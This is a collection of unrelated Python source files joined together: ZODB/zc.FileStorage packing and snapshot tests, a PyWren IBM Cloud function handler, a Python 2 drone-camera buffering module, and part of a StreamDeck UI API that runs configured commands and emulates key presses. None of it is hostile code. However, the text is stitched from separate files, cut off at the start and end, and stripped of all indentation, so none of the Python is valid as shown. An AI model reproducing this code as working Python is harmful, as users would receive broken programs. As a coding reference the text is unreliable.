revid3 = self._dostoreNP(oid, revid=revid2, data=pdumps(obj))
# Now make sure all three revisions can be extracted
data = self._storage.loadSerial(oid, revid1)
pobj = pickle.loads(data)
eq(pobj.getoid(), oid)
eq(pobj.value, 1)
data = self._storage.loadSerial(oid, revid2)
pobj = pickle.loads(data)
eq(pobj.getoid(), oid)
eq(pobj.value, 2)
data = self._storage.loadSerial(oid, revid3)
pobj = pickle.loads(data)
eq(pobj.getoid(), oid)
eq(pobj.value, 3)
# Now pack all transactions; need to sleep a second to make
# sure that the pack time is greater than the last commit time.
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
self._storage.pack(packtime, referencesf)
# Only old revisions of the object should be gone. We don't gc
raises(KeyError, self._storage.loadSerial, oid, revid1)
raises(KeyError, self._storage.loadSerial, oid, revid2)
self._storage.loadSerial(oid, revid3)
def checkPackUndoLog(self):
self._initroot()
# Create a `persistent' object
obj = self._newobj()
oid = obj.getoid()
obj.value = 1
# Commit two different revisions
revid1 = self._dostoreNP(oid, data=pdumps(obj))
obj.value = 2
snooze()
packtime = time.time()
snooze()
self._dostoreNP(oid, revid=revid1, data=pdumps(obj))
# Now pack the first transaction
self.assertEqual(3, len(self._storage.undoLog()))
self._storage.pack(packtime, referencesf)
        # The undo log contains only the most recent transaction
self.assertEqual(3, len(self._storage.undoLog()))
def checkPackWithGCOnDestinationAfterRestore(self):
pass
def checkPackWithMultiDatabaseReferences(self):
pass
class ZCFileStorageTestsWithBlobs(ZCFileStorageTests):
blob_dir = "blobs"
time_hack_template = """
now = 1268166473.0
import time
time_time, time_sleep = time.time, time.sleep
time.sleep(1) # Slow things down a bit to give the test time to commit
def faux_time():
global now
now += 1
return now
def faux_sleep(x):
logging.info('sleep '+ repr(x))
time.time, time.sleep = faux_time, faux_sleep
"""
GIG_hack_template = """
import sys
sys.path[:] = %(syspath)r
import zc.FileStorage
zc.FileStorage.GIG = 100
"""
def test_pack_sleep():
"""
Make sure that sleep is being called. :)
Mess with time -- there should be infrastructure for this!
>>> exec(time_hack_template)
>>> time.sleep = time_sleep
>>> import os, threading, transaction, shutil, ZODB.FileStorage, zc.FileStorage
>>> fs = ZODB.FileStorage.FileStorage('data.fs',
... packer=zc.FileStorage.packer1)
>>> db = ZODB.DB(fs)
>>> conn = db.open()
>>> for i in range(5):
... conn.root()[i] = conn.root().__class__()
... transaction.commit()
>>> pack_time = time.time()
>>> for i in range(5):
... conn.root()[i].x = 1
... transaction.commit()
>>> pack_script_template = zc.FileStorage.pack_script_template
>>> zc.FileStorage.pack_script_template = (
... time_hack_template + GIG_hack_template + pack_script_template)
>>> thread = threading.Thread(target=fs.pack, args=(pack_time, now))
>>> thread.start()
>>> for i in range(100):
... if os.path.exists('data.fs.packscript'):
... break
... time.sleep(0.01)
>>> def faux_sleep(x):
... print('sleep '+repr(x))
>>> time.sleep = faux_sleep
>>> conn.root().x = 1
>>> transaction.commit()
>>> thread.join()
sleep 1.0
>>> fs.close()
>>> with open('data.fs.packlog') as fd:
... print(fd.read()) # doctest: +NORMALIZE_WHITESPACE
2010-03-09 15:27:55,000 root INFO packing to 2010-03-09 20:28:06.000000,
sleep 1
2010-03-09 15:27:57,000 root INFO read 162
2010-03-09 15:27:59,000 root INFO sleep 2.0
2010-03-09 15:28:01,000 root INFO read 411
2010-03-09 15:28:03,000 root INFO sleep 2.0
2010-03-09 15:28:05,000 root INFO read 680
2010-03-09 15:28:07,000 root INFO sleep 2.0
2010-03-09 15:28:09,000 root INFO read 968
2010-03-09 15:28:11,000 root INFO sleep 2.0
2010-03-09 15:28:13,000 root INFO read 1275
2010-03-09 15:28:15,000 root INFO sleep 2.0
2010-03-09 15:28:17,000 root INFO read 1601
2010-03-09 15:28:19,000 root INFO sleep 2.0
2010-03-09 15:28:21,000 root INFO initial scan 6 objects at 1601
2010-03-09 15:28:22,000 root INFO copy to pack time
2010-03-09 15:28:24,000 root INFO read 162
2010-03-09 15:28:26,000 root INFO sleep 2.0
2010-03-09 15:28:28,000 root INFO read 411
2010-03-09 15:28:30,000 root INFO sleep 2.0
2010-03-09 15:28:32,000 root INFO read 680
2010-03-09 15:28:34,000 root INFO sleep 2.0
2010-03-09 15:28:36,000 root INFO read 968
2010-03-09 15:28:38,000 root INFO sleep 2.0
2010-03-09 15:28:40,000 root INFO read 1275
2010-03-09 15:28:42,000 root INFO sleep 2.0
2010-03-09 15:28:44,000 root INFO read 1601
2010-03-09 15:28:46,000 root INFO sleep 2.0
2010-03-09 15:28:47,000 root INFO copy from pack time
2010-03-09 15:28:51,000 root INFO sleep 1.0
2010-03-09 15:28:52,000 root INFO read 1737
2010-03-09 15:28:54,000 root INFO sleep 5.0
2010-03-09 15:28:58,000 root INFO sleep 1.0
2010-03-09 15:28:59,000 root INFO read 1873
2010-03-09 15:29:01,000 root INFO sleep 5.0
2010-03-09 15:29:05,000 root INFO sleep 1.0
2010-03-09 15:29:06,000 root INFO read 2009
2010-03-09 15:29:08,000 root INFO sleep 5.0
2010-03-09 15:29:12,000 root INFO sleep 1.0
2010-03-09 15:29:13,000 root INFO read 2145
2010-03-09 15:29:15,000 root INFO sleep 5.0
2010-03-09 15:29:19,000 root INFO sleep 1.0
2010-03-09 15:29:20,000 root INFO read 2281
2010-03-09 15:29:22,000 root INFO sleep 5.0
2010-03-09 15:29:23,000 root INFO packscript done
>>> time.sleep = time_sleep
>>> time.time = time_time
Now do it all again with a longer sleep:
>>> _ = shutil.copyfile('data.fs.old', 'data.fs')
>>> fs = ZODB.FileStorage.FileStorage('data.fs',
... packer=zc.FileStorage.packer2)
>>> fs.pack(pack_time, now)
>>> with open('data.fs.packlog') as fd:
... print(fd.read()) # doctest: +NORMALIZE_WHITESPACE
2010-03-09 15:27:55,000 root INFO packing to 2010-03-09 20:28:06.000000,
sleep 2
2010-03-09 15:27:57,000 root INFO read 162
2010-03-09 15:27:59,000 root INFO sleep 4.0
2010-03-09 15:28:01,000 root INFO read 411
2010-03-09 15:28:03,000 root INFO sleep 4.0
2010-03-09 15:28:05,000 root INFO read 680
2010-03-09 15:28:07,000 root INFO sleep 4.0
2010-03-09 15:28:09,000 root INFO read 968
2010-03-09 15:28:11,000 root INFO sleep 4.0
2010-03-09 15:28:13,000 root INFO read 1275
2010-03-09 15:28:15,000 root INFO sleep 4.0
2010-03-09 15:28:17,000 root INFO read 1601
2010-03-09 15:28:19,000 root INFO sleep 4.0
2010-03-09 15:28:21,000 root INFO initial scan 6 objects at 1601
2010-03-09 15:28:22,000 root INFO copy to pack time
2010-03-09 15:28:24,000 root INFO read 162
2010-03-09 15:28:26,000 root INFO sleep 4.0
2010-03-09 15:28:28,000 root INFO read 411
2010-03-09 15:28:30,000 root INFO sleep 4.0
2010-03-09 15:28:32,000 root INFO read 680
2010-03-09 15:28:34,000 root INFO sleep 4.0
2010-03-09 15:28:36,000 root INFO read 968
2010-03-09 15:28:38,000 root INFO sleep 4.0
2010-03-09 15:28:40,000 root INFO read 1275
2010-03-09 15:28:42,000 root INFO sleep 4.0
2010-03-09 15:28:44,000 root INFO read 1601
2010-03-09 15:28:46,000 root INFO sleep 4.0
2010-03-09 15:28:47,000 root INFO copy from pack time
2010-03-09 15:28:51,000 root INFO sleep 2.0
2010-03-09 15:28:52,000 root INFO read 1737
2010-03-09 15:28:54,000 root INFO sleep 10.0
2010-03-09 15:28:58,000 root INFO sleep 2.0
2010-03-09 15:28:59,000 root INFO read 1873
2010-03-09 15:29:01,000 root INFO sleep 10.0
2010-03-09 15:29:05,000 root INFO sleep 2.0
2010-03-09 15:29:06,000 root INFO read 2009
2010-03-09 15:29:08,000 root INFO sleep 10.0
2010-03-09 15:29:12,000 root INFO sleep 2.0
2010-03-09 15:29:13,000 root INFO read 2145
2010-03-09 15:29:15,000 root INFO sleep 10.0
2010-03-09 15:29:19,000 root INFO sleep 2.0
2010-03-09 15:29:20,000 root INFO read 2281
2010-03-09 15:29:22,000 root INFO sleep 10.0
2010-03-09 15:29:26,000 root INFO sleep 2.0
2010-03-09 15:29:27,000 root INFO read 2514
2010-03-09 15:29:29,000 root INFO sleep 10.0
2010-03-09 15:29:30,000 root INFO packscript done
>>> zc.FileStorage.pack_script_template = pack_script_template
"""
def data_transform_and_untransform_hooks():
r"""The Packer factory takes uptions to transform and untransform data
This is helpful when data records aren't raw pickles or when you want
to transform them so that they aren't raw pickles. To test this,
we'll take a file storage database and convert it to use the
    ZODB.tests.hexstorage transformation.
>>> import os, ZODB.FileStorage
>>> db = ZODB.DB(ZODB.FileStorage.FileStorage(
... 'data.fs', blob_dir='blobs',
... packer=zc.FileStorage.Packer(
... transform='zc.FileStorage.tests:hexer',
... untransform='zc.FileStorage.tests:unhexer',
... )))
>>> conn = db.open()
>>> conn.root.b = ZODB.blob.Blob(b'test')
>>> conn.transaction_manager.commit()
>>> with conn.root.b.open() as fd:
... _ = fd.read()
So, here we have some untransformed data. Now, we'll pack it:
>>> db.pack()
Now, the database records are hex:
>>> db.storage.load(b'\0'*8)[0][:50]
'.h6370657273697374656e742e6d617070696e670a50657273'
>>> db.storage.load(b'\0'*7+b'\1')[0][:50]
'.h635a4f44422e626c6f620a426c6f620a71012e4e2e'
    Let's add an object. (We get away with this because the objects we
use are in the cache. :)
>>> conn.root.a = conn.root().__class__()
>>> conn.transaction_manager.commit()
Now the root and the new object are not hex:
>>> db.storage.load(b'\0'*8)[0][:50]
'cpersistent.mapping\nPersistentMapping\nq\x01.}q\x02U\x04data'
>>> db.storage.load(b'\0'*7+b'\2')[0][:50]
'cpersistent.mapping\nPersistentMapping\nq\x01.}q\x02U\x04data'
We capture the current time as the pack time:
>>> import time
>>> pack_time = time.time()
>>> time.sleep(.1)
We'll throw in a blob modification:
>>> with conn.root.b.open('w') as fd:
... _ = fd.write(b'test 2')
>>> conn.transaction_manager.commit()
Now pack and make sure all the records have been transformed:
>>> db.pack()
>>> from ZODB.utils import p64
>>> for i in range(len(db.storage)):
... if db.storage.load(p64(i))[0][:2] != '.h':
... print(i)
We should have only one blob file:
>>> nblobs = 0
>>> for _, _, files in os.walk('blobs'):
... for file in files:
... if file.endswith('.blob'):
... nblobs += 1
>>> nblobs
1
"""
def snapshot_in_time():
r"""We can take a snapshot in time
This is a copy of a database as of a given time and containing
only current records as of that time.
First, we'll hack time:
>>> import logging, os
>>> exec(time_hack_template)
Next, we'll create a file storage with some data:
>>> import ZODB.FileStorage
>>> import transaction
>>> conn = ZODB.connection('data.fs')
>>> for i in range(5):
... conn.root()[i] = conn.root().__class__()
... transaction.commit()
>>> for i in range(5):
... conn.root()[i].x = 0
... transaction.commit()
>>> for j in range(10):
... for i in range(5):
... conn.root()[i].x += 1
... transaction.commit()
>>> import ZODB.TimeStamp
>>> copy_time = ZODB.TimeStamp.TimeStamp(
... conn.db().storage.lastTransaction())
>>> for j in range(10):
... for i in range(5):
... conn.root()[i].x += 1
... transaction.commit()
    We'll compute a hash of the old file contents:
>>> import hashlib
>>> with open('data.fs', 'rb') as fd:
... hash = hashlib.sha1(fd.read()).digest()
OK, we have a database with a bunch of revisions.
Now, let's make a snapshot:
>>> import zc.FileStorage.snapshotintime
>>> copy_time = '%s-%s-%sT%s:%s:%s' % (
... copy_time.year(), copy_time.month(), copy_time.day(),
... copy_time.hour(), copy_time.minute(), int(copy_time.second()))
>>> zc.FileStorage.snapshotintime.main(
... ['data.fs', copy_time, 'snapshot.fs'])
>>> sorted(os.listdir('.')) # doctest: +NORMALIZE_WHITESPACE
['data.fs', 'data.fs.index', 'data.fs.lock', 'data.fs.tmp',
'snapshot.fs', 'snapshot.fs.index']
    The original file is unchanged:
>>> with open('data.fs', 'rb') as fd:
... hashlib.sha1(fd.read()).digest() == hash
True
The new file has just the final records:
>>> for t in ZODB.FileStorage.FileIterator('snapshot.fs'):
... print(ZODB.TimeStamp.TimeStamp(t.tid))
... for record in t:
... print(repr(record.oid))
2010-03-09 20:28:05.000000
'\x00\x00\x00\x00\x00\x00\x00\x00'
2010-03-09 20:28:56.000000
'\x00\x00\x00\x00\x00\x00\x00\x01'
2010-03-09 20:28:57.000000
'\x00\x00\x00\x00\x00\x00\x00\x02'
2010-03-09 20:28:58.000000
'\x00\x00\x00\x00\x00\x00\x00\x03'
2010-03-09 20:28:59.000000
'\x00\x00\x00\x00\x00\x00\x00\x04'
2010-03-09 20:29:00.000000
'\x00\x00\x00\x00\x00\x00\x00\x05'
Of course, we can open the copy:
>>> conn.close()
>>> conn = ZODB.connection('snapshot.fs')
>>> sorted(conn.root().keys()) == range(5)
True
>>> for i in range(5):
... if conn.root()[i].x != 10:
... print('oops', conn.root()[i].x)
>>> time.time, time.sleep = time_time, time_sleep
We get usage if the wrong number or form of arguments are given:
>>> import sys
>>> stderr = sys.stderr
>>> sys.stderr = sys.stdout
>>> argv0 = sys.argv[0]
>>> sys.argv[0] = 'snapshot-in-time'
>>> try: zc.FileStorage.snapshotintime.main([])
... except SystemExit as v: pass
... else: print('oops')
Usage: snapshot-in-time [input-path utc-snapshot-time output-path]
<BLANKLINE>
Make a point-in time snapshot of a file-storage data file containing
just the current records as of the given time. The resulting file can
be used as a basis of a demo storage.
<BLANKLINE>
If the output file isn't given, then a file name will be generated
based on the input file name and the utc-snapshot-time.
<BLANKLINE>
If the utc-snapshot-time is ommitted, then the current time will be used.
<BLANKLINE>
Note: blobs (if any) aren't copied.
<BLANKLINE>
The UTC time is a string of the form: YYYY-MM-DDTHH:MM:SS. The time
conponents are optional. The time defaults to midnight, UTC.
<BLANKLINE>
>>> sys.argv[0] = argv0
>>> try: zc.FileStorage.snapshotintime.main(['xxx', 'xxx', 'xxx'])
... except SystemExit as v: pass
... else: print('oops')
xxx Does not exist.
>>> try: zc.FileStorage.snapshotintime.main(['data.fs', 'xxx', 'xxx'])
... except SystemExit as v: pass
... else: print('oops')
Bad date-time: xxx
>>> sys.stderr = stderr
If you omit the output file, a file name will be generated based on the
time:
>>> zc.FileStorage.snapshotintime.main(['data.fs', copy_time])
>>> sorted(os.listdir('.')) # doctest: +NORMALIZE_WHITESPACE
['data.fs', 'data.fs.index', 'data.fs.lock', 'data.fs.tmp',
'data2010-3-9T20:29:0.fs', 'data2010-3-9T20:29:0.fs.index',
'snapshot.fs', 'snapshot.fs.index', 'snapshot.fs.lock', 'snapshot.fs.tmp']
>>> with open('data2010-3-9T20:29:0.fs', 'rb') as fd1, open('snapshot.fs', 'rb') as fd2:
... fd1.read() == fd2.read()
True
"""
def hexer(data):
if data[:2] == b".h":
return data
return b".h" + binascii.hexlify(data)
def unhexer(data):
if not data:
return data
if data[:2] == b".h":
return binascii.unhexlify(data[2:])
return data
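# Worked example: hexer(b'abc') returns b'.h616263' and unhexer(b'.h616263')
# returns b'abc'; already-hexed data passes through hexer unchanged.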
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ZCFileStorageTests, "check"))
suite.addTest(unittest.makeSuite(ZCFileStorageTestsWithBlobs, "check"))
suite.addTest(
doctest.DocFileSuite(
"blob_packing.txt",
setUp=setupstack.setUpDirectory,
tearDown=setupstack.tearDown,
)
)
suite.addTest(
doctest.DocTestSuite(
setUp=setupstack.setUpDirectory, tearDown=setupstack.tearDown
)
)
return suite
|
handler.py
|
#
# Copyright 2018 PyWren Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import pika
import time
import json
import pickle
import logging
import tempfile
import traceback
from threading import Thread
from multiprocessing import Process, Pipe
from distutils.util import strtobool
from pywren_ibm_cloud import version
from pywren_ibm_cloud.utils import sizeof_fmt
from pywren_ibm_cloud.config import extract_storage_config
from pywren_ibm_cloud.storage import InternalStorage
from pywren_ibm_cloud.function.jobrunner import JobRunner
from pywren_ibm_cloud.function.utils import get_memory_usage
from pywren_ibm_cloud.config import cloud_logging_config, JOBS_PREFIX
from pywren_ibm_cloud.storage.utils import create_output_key, create_status_key, create_init_key
logging.getLogger('pika').setLevel(logging.CRITICAL)
logger = logging.getLogger('handler')
TEMP = tempfile.gettempdir()
STORAGE_BASE_DIR = os.path.join(TEMP, JOBS_PREFIX)
PYWREN_LIBS_PATH = '/action/pywren_ibm_cloud/libs'
def function_handler(event):
start_time = time.time()
log_level = event['log_level']
cloud_logging_config(log_level)
logger.debug("Action handler started")
extra_env = event.get('extra_env', {})
os.environ.update(extra_env)
os.environ.update({'PYWREN_FUNCTION': 'True',
'PYTHONUNBUFFERED': 'True'})
config = event['config']
call_id = event['call_id']
job_id = event['job_id']
executor_id = event['executor_id']
exec_id = "{}/{}/{}".format(executor_id, job_id, call_id)
logger.info("Execution-ID: {}".format(exec_id))
runtime_name = event['runtime_name']
runtime_memory = event['runtime_memory']
execution_timeout = event['execution_timeout']
logger.debug("Runtime name: {}".format(runtime_name))
logger.debug("Runtime memory: {}MB".format(runtime_memory))
logger.debug("Function timeout: {}s".format(execution_timeout))
func_key = event['func_key']
data_key = event['data_key']
data_byte_range = event['data_byte_range']
storage_config = extract_storage_config(config)
internal_storage = InternalStorage(storage_config)
call_status = CallStatus(config, internal_storage)
call_status.response['host_submit_time'] = event['host_submit_time']
call_status.response['start_time'] = start_time
context_dict = {
'python_version': os.environ.get("PYTHON_VERSION"),
'call_id': call_id,
'job_id': job_id,
'executor_id': executor_id,
'activation_id': os.environ.get('__PW_ACTIVATION_ID')
}
call_status.response.update(context_dict)
show_memory_peak = strtobool(os.environ.get('SHOW_MEMORY_PEAK', 'False'))
call_status.response['peak_memory_usage'] = 0
try:
if version.__version__ != event['pywren_version']:
msg = ("PyWren version mismatch. Host version: {} - Runtime version: {}"
.format(event['pywren_version'], version.__version__))
raise RuntimeError('HANDLER', msg)
# send init status event
call_status.send('__init__')
# call_status.response['free_disk_bytes'] = free_disk_space("/tmp")
custom_env = {'PYWREN_CONFIG': json.dumps(config),
'PYWREN_EXECUTION_ID': exec_id,
'PYTHONPATH': "{}:{}".format(os.getcwd(), PYWREN_LIBS_PATH)}
os.environ.update(custom_env)
jobrunner_stats_dir = os.path.join(STORAGE_BASE_DIR, executor_id, job_id, call_id)
os.makedirs(jobrunner_stats_dir, exist_ok=True)
jobrunner_stats_filename = os.path.join(jobrunner_stats_dir, 'jobrunner.stats.txt')
jobrunner_config = {'pywren_config': config,
'call_id': call_id,
'job_id': job_id,
'executor_id': executor_id,
'func_key': func_key,
'data_key': data_key,
'log_level': log_level,
'data_byte_range': data_byte_range,
'output_key': create_output_key(JOBS_PREFIX, executor_id, job_id, call_id),
'stats_filename': jobrunner_stats_filename}
setup_time = time.time()
call_status.response['setup_time'] = round(setup_time - start_time, 8)
if show_memory_peak:
mm_handler_conn, mm_conn = Pipe()
memory_monitor = Thread(target=memory_monitor_worker, args=(mm_conn, ))
memory_monitor.start()
handler_conn, jobrunner_conn = Pipe()
jobrunner = JobRunner(jobrunner_config, jobrunner_conn, internal_storage)
logger.debug('Starting JobRunner process')
local_execution = strtobool(os.environ.get('__PW_LOCAL_EXECUTION', 'False'))
jrp = Thread(target=jobrunner.run) if local_execution else Process(target=jobrunner.run)
jrp.start()
jrp.join(execution_timeout)
logger.debug('JobRunner process finished')
call_status.response['exec_time'] = round(time.time() - setup_time, 8)
if jrp.is_alive():
            # If the process is still alive after jrp.join(execution_timeout), kill it
try:
jrp.terminate()
except Exception:
# thread does not have terminate method
pass
msg = ('Function exceeded maximum time of {} seconds and was '
'killed'.format(execution_timeout))
raise TimeoutError('HANDLER', msg)
if show_memory_peak:
mm_handler_conn.send('STOP')
memory_monitor.join()
peak_memory_usage = int(mm_handler_conn.recv())
logger.info("Peak memory usage: {}".format(sizeof_fmt(peak_memory_usage)))
call_status.response['peak_memory_usage'] = peak_memory_usage
if not handler_conn.poll():
logger.error('No completion message received from JobRunner process')
logger.debug('Assuming memory overflow...')
# Only 1 message is returned by jobrunner when it finishes.
# If no message, this means that the jobrunner process was killed.
            # 99% of the time the jobrunner is killed due to an OOM, so we assume an OOM here.
msg = 'Function exceeded maximum memory and was killed'
raise MemoryError('HANDLER', msg)
if os.path.exists(jobrunner_stats_filename):
with open(jobrunner_stats_filename, 'r') as fid:
for line in fid.readlines():
key, value = line.strip().split(" ", 1)
try:
call_status.response[key] = float(value)
except Exception:
call_status.response[key] = value
if key in ['exception', 'exc_pickle_fail', 'result', 'new_futures']:
call_status.response[key] = eval(value)
# call_status.response['server_info'] = get_server_info()
call_status.response['end_time'] = time.time()
except Exception:
# internal runtime exceptions
print('----------------------- EXCEPTION !-----------------------', flush=True)
traceback.print_exc(file=sys.stdout)
print('----------------------------------------------------------', flush=True)
call_status.response['end_time'] = time.time()
call_status.response['exception'] = True
pickled_exc = pickle.dumps(sys.exc_info())
pickle.loads(pickled_exc) # this is just to make sure they can be unpickled
call_status.response['exc_info'] = str(pickled_exc)
finally:
call_status.send('__end__')
for key in extra_env:
del os.environ[key]
logger.info("Finished")
class CallStatus:
def __init__(self, pywren_config, internal_storage):
self.config = pywren_config
self.rabbitmq_monitor = self.config['pywren'].get('rabbitmq_monitor', False)
self.store_status = strtobool(os.environ.get('__PW_STORE_STATUS', 'True'))
self.internal_storage = internal_storage
self.response = {'exception': False}
def send(self, event_type):
self.response['type'] = event_type
if self.store_status:
if self.rabbitmq_monitor:
self._send_status_rabbitmq()
if not self.rabbitmq_monitor or event_type == '__end__':
self._send_status_os()
def _send_status_os(self):
"""
Send the status event to the Object Storage
"""
executor_id = self.response['executor_id']
job_id = self.response['job_id']
call_id = self.response['call_id']
act_id = self.response['activation_id']
if self.response['type'] == '__init__':
init_key = create_init_key(JOBS_PREFIX, executor_id, job_id, call_id, act_id)
self.internal_storage.put_data(init_key, '')
elif self.response['type'] == '__end__':
status_key = create_status_key(JOBS_PREFIX, executor_id, job_id, call_id)
dmpd_response_status = json.dumps(self.response)
drs = sizeof_fmt(len(dmpd_response_status))
logger.info("Storing execution stats - Size: {}".format(drs))
self.internal_storage.put_data(status_key, dmpd_response_status)
def _send_status_rabbitmq(self):
"""
Send the status event to RabbitMQ
"""
dmpd_response_status = json.dumps(self.response)
drs = sizeof_fmt(len(dmpd_response_status))
executor_id = self.response['executor_id']
job_id = self.response['job_id']
rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')
status_sent = False
output_query_count = 0
params = pika.URLParameters(rabbit_amqp_url)
exchange = 'pywren-{}-{}'.format(executor_id, job_id)
while not status_sent and output_query_count < 5:
output_query_count = output_query_count + 1
try:
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.exchange_declare(exchange=exchange, exchange_type='fanout', auto_delete=True)
channel.basic_publish(exchange=exchange, routing_key='',
body=dmpd_response_status)
connection.close()
logger.info("Execution status sent to rabbitmq - Size: {}".format(drs))
status_sent = True
except Exception as e:
logger.error("Unable to send status to rabbitmq")
logger.error(str(e))
logger.info('Retrying to send status to rabbitmq...')
time.sleep(0.2)
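# memory_monitor_worker runs in a separate thread: it samples memory usage every
# `delay` seconds until the handler sends anything (here 'STOP') through the Pipe,
# then replies with the observed peak in bytes. A hedged sketch of the handshake
# used by the handler above:
#
#     parent_conn, child_conn = Pipe()
#     t = Thread(target=memory_monitor_worker, args=(child_conn,))
#     t.start()
#     ...                        # run the job
#     parent_conn.send('STOP')   # any message ends the polling loop
#     t.join()
#     peak_bytes = int(parent_conn.recv())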
def memory_monitor_worker(mm_conn, delay=0.01):
peak = 0
logger.debug("Starting memory monitor")
def make_measurement(peak):
mem = get_memory_usage(formatted=False) + 5*1024**2
if mem > peak:
peak = mem
return peak
while not mm_conn.poll(delay):
try:
peak = make_measurement(peak)
except Exception:
break
try:
peak = make_measurement(peak)
except Exception as e:
logger.error('Memory monitor: {}'.format(e))
mm_conn.send(peak)
|
MamboVision.py
|
"""
MamboVision is separated from the main Mambo class to enable the use of the drone without the FPV camera.
If you want to do vision processing, you will need to create a MamboVision object to capture the
video stream.
This module relies on the opencv module, which can be a bit challenging to compile on the Raspberry Pi.
The instructions here are very helpful:
https://www.pyimagesearch.com/2016/04/18/install-guide-raspberry-pi-3-raspbian-jessie-opencv-3/
I did not use a virtual environment and just installed it in my regular python 2.7 environment.
That webpage says it takes only a few hours, but on my RPI 3 it would only compile in single-threaded mode,
which took overnight to finish.
I also had to compile ffmpeg with a MAX_SLICES of 8192. Directions for that are here.
https://github.com/tgogos/rpi_ffmpeg
Author: Amy McGovern, dramymcgovern@gmail.com
"""
import cv2
import threading
import time
class MamboVision:
def __init__(self, fps=10, buffer_size=10):
"""
Set up your vision object and initialize your buffers. You won't start seeing pictures
until you call open_video.
:param fps: frames per second (don't set this very high on a Raspberry Pi!). Defaults to 10 which is a number
that should keep a Raspberry Pi busy but not overheated.
:param buffer_size: number of frames to buffer in memory. Defaults to 10.
"""
self.fps = fps
self.buffer_size = buffer_size
# initialize a buffer (will contain the last buffer_size vision objects)
self.buffer = [None] * buffer_size
self.buffer_index = 0
# setup the thread for monitoring the vision (but don't start it until we connect in open_video)
self.vision_thread = threading.Thread(target=self._buffer_vision, args=(fps, buffer_size))
self.vision_running = True
def open_video(self, max_retries=3):
"""
Open the video stream in opencv for capturing and processing. The address for the stream
is the same for all Mambos and is documented here:
http://forum.developer.parrot.com/t/streaming-address-of-mambo-fpv-for-videoprojection/6442/6
Remember that this will only work if you have connected to the wifi for your mambo!
:param max_retries: Maximum number of retries in opening the camera (remember to connect to the camera wifi!).
Defaults to 3.
:return: True if the vision opened correctly and False otherwise
"""
print "opening the camera"
self.capture = cv2.VideoCapture("rtsp://192.168.99.1/media/stream2")
#print self.capture.get(cv2.CV_CAP_PROPS_FPS)
# if it didn't open the first time, try again a maximum number of times
try_num = 1
while (not self.capture.isOpened() and try_num < max_retries):
print "re-trying to open the capture"
self.capture = cv2.VideoCapture("rtsp://192.168.99.1/media/stream2")
try_num += 1
# return whether the vision opened
return self.capture.isOpened()
def start_video_buffering(self):
"""
If the video capture was successfully opened, then start the thread to buffer the stream
:return:
"""
if (self.capture.isOpened()):
print "starting vision thread"
self.vision_thread.start()
def _buffer_vision(self, fps, buffer_size):
"""
Internal method to save valid video captures from the camera fps times a second
:param fps: frames per second (set in init)
:param buffer_size: number of images to buffer (set in init)
:return:
"""
while (self.vision_running):
# grab the latest image
print "grabbing frame"
capture_correct, video_frame = self.capture.read()
print capture_correct
if (capture_correct):
self.buffer_index += 1
self.buffer_index %= buffer_size
print "saving frame to buffer"
#print video_frame
self.buffer[self.buffer_index] = video_frame
# put the thread back to sleep for fps
print "sleeping for %f" % (1.0 / fps)
time.sleep(1.0 / fps)
def get_latest_valid_picture(self):
"""
Return the latest valid image (from the buffer)
:return: last valid image received from the Mambo
"""
return self.buffer[self.buffer_index]
def stop_vision_buffering(self):
"""
Should stop the vision thread
"""
self.vision_running = False
|
api.py
|
"""Defines the Python API for interacting with the StreamDeck Configuration UI"""
import json
import sys
import os
from pathlib import Path
import threading
from functools import partial
import shlex, subprocess
from typing import Dict, List, Tuple, Union
from warnings import warn
from PIL import Image, ImageDraw, ImageFont
from pynput.keyboard import Controller, Key
from StreamDeck import DeviceManager, ImageHelpers
from StreamDeck.Devices import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from streamdeck_ui.config import CONFIG_FILE_VERSION, DEFAULT_FONT, FONTS_PATH, STATE_FILE
image_cache: Dict[str, memoryview] = {}
decks: Dict[str, StreamDeck.StreamDeck] = {}
state: Dict[str, Dict[str, Union[int, Dict[int, Dict[int, Dict[str, str]]]]]] = {}
keyboard = Controller()
live_functions: List = []
def _run_process(command: str):
""" Implement a double-fork to detach process"""
pid = os.fork()
if pid > 0:
# in main process: wait for first fork
pid2, status = os.waitpid(pid, 0)
if (status != 0):
print("fork #1 failed: return code: {}".format(status))
return
os.setsid()
# in first fork: do second fork
try:
pid = os.fork()
if pid > 0:
# in first fork: exit without atexit handler
os._exit(0)
except OSError as e:
print ("fork #2 failed: {} ({})".format(e.errno, e.strerror))
os._exit(1)
# in second fork: exec the command as a detached process, so killing StreamDeck doesn't take it down with it
args = shlex.split(command)
os.execv(args[0], args)
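# The function above follows the classic Unix double-fork idiom: the first child
# calls os.setsid() to leave the controlling session, the second child (reparented
# to init once its parent exits) finally exec()s the target, so the launched
# program survives if streamdeck_ui itself is killed. Note that os.execv does not
# search PATH, so the command must start with a path to the executable, e.g. a
# hypothetical button command like:
#     _run_process("/usr/bin/xdg-open https://example.com")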
def _key_change_callback(deck_id: str, _deck: StreamDeck.StreamDeck, key: int, state: bool) -> None:
if state:
page = get_page(deck_id)
# Command running
command = get_button_command(deck_id, page, key)
if command:
try:
#subprocess.Popen(shlex.split(command),cwd=Path.home())
_run_process(command)
except Exception as e:
print('Cannot exec command "{}" Exception: {} {}'.format(command, sys.exc_info()[0], getattr(e, "message", e) ))
pass
# Key press emulation
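# The keys string is a comma-separated list of chords; each chord joins key
# names with '+', e.g. a hypothetical "ctrl+alt+t, enter": every name in a
# chord is pressed together and then released in the finally block below.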
keys = get_button_keys(deck_id, page, key)
if keys:
keys = keys.strip().replace(" ", "")
for section in keys.split(","):
pressed_keys = []
try:
for key_name in section.split("+"):
keycode = getattr(Key, key_name.lower(), key_name)
keyboard.press(keycode)
pressed_keys.append(key_name)
except Exception as e:
try:
print("An exception '{}' occured during Key press of {} (keycode: {}): {}"
.format(sys.exc_info()[0], key_name, keycode, getattr(e, "message", e)))
pass
except:
pass
finally:
for key_name in pressed_keys:
keyboard.release(getattr(Key, key_name.lower(), key_name))
# Text writing
write = get_button_write(deck_id, page, key)
if write:
keyboard.type(write)
# Brightness
